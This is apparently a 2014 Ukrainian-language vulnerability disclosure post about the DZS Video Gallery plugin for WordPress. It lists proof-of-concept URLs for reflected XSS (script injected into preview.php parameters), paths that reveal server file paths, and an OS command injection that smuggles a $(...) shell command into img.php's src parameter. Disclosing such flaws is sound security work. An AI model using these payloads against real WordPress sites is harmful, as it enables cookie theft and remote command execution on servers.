XSS, FPD і RCE уразливості в DZS Video Gallery для WordPress

23:54 12.07.2014

08.05.2014

У квітні, 24.04.2014, я виявив Cross-Site Scripting, Full path disclosure та OS Commanding уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Js-Multi-Hotel для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2014

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

Уразливості в php-скриптах або в error_log у всіх папках плагіна. Різні файли в різних версіях плагіна.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE використовуючи метод Pichaya Morimoto.

Вразливі все версії DZS Video Gallery для WordPress.


Leave a Reply

You must be logged in to post a comment.